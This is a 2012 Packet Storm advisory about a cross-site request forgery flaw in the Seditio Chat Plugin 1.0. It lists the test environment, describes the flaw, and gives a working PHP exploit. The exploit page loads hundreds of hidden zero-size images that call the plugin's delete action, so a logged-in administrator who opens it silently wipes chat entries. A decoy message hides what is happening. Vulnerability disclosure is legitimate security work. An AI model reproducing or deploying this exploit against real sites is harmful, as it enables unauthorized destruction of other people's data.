Seditio Chat 1.0 Cross Site Request Forgery

2012-04-11T00:00:00
ID PACKETSTORM:111757
Type packetstorm
Reporter Akastep
Modified 2012-04-11T00:00:00

Description

                                        
                                            `=========================================================  
Vulnerable Software: Seditio Chat Plugin (Chat İndex Plugin) v 1.0  
http://www.seditio-eklenti.com/page.php?id=418  
http://www.seditio-eklenti.com/chat-plugin-index-d418.html  
Downloaded: http://www.seditio-eklenti.com/datas/users/1-chat.rar  
(MD5 SUM: d1565b438199984661cf2147572724a6 *1-chat.rar)  
=========================================================  
Tested:  
With Seditio v165  
*php.ini MAGIC_QUOTES_GPC OFF*  
Safe mode off  
/*  
OS: Windows XP SP2 (32 bit)  
Apache: 2.2.21.0  
PHP Version: 5.2.17.17  
mysql> select version()  
-> ;  
+-----------+  
| version() |  
+-----------+  
| 5.5.21 |  
+-----------+  
*/  
=========================================================  
About Software:  
Seditio Chat Plugin (Chat İndex Plugin) v 1.0 is popular plugin for Seditio CMS.  
It gives ability to users~administrators~moderators to chatting.  
=========================================================  
Vuln Desc:  
This plugin is prone to CROSS SITE REQUEST FORGERY vulnerability.  
It uses $_GET without any proper check of request validity when deleting entries from chat.  
It can be used by malicious people for delete chat entries.  
================ Seditio chat plugin Delete chat entries CSRF exploit =================  
<?php  
/*  
4 Fun  
Seditio chat plugin Delete chat entries CSRF exploit (Sounds peacifull xD)  
*/  
$target='http://192.168.0.15/learn/128/sed/seditio165/'; // target site  
$howmuch=500;// how much entries to "rm" in chat? :)  
  
  
/* Do not change */  
  
$body=str_repeat(PHP_EOL,300);  
$howmuch=(int)$howmuch;  
$sithere=strrev('OoPs! Can not Load Page.WTH? What about Refresh ?');// 4 think about :D.While we deleting chat entries:D  
for($i=0;$i<=$howmuch;$i++)  
{  
$body.='<img src="'. $target . '/plug.php?e=chat&c=delete&id=' . $i . '" width="0" height="0" /><br>' .PHP_EOL;  
}  
die($body . '<h1>' . $sithere . '</h1>');  
/* EOF */  
?>  
==============================EOF================================  
  
  
/AkaStep ^_^  
+++++++Greetz to all+++++++++++  
packetstormsecurity.*,securityfocus.com,cxsecurity.com,security.nnov.ru,securtiyvulns.com and to all others!  
Thank you.  
  
`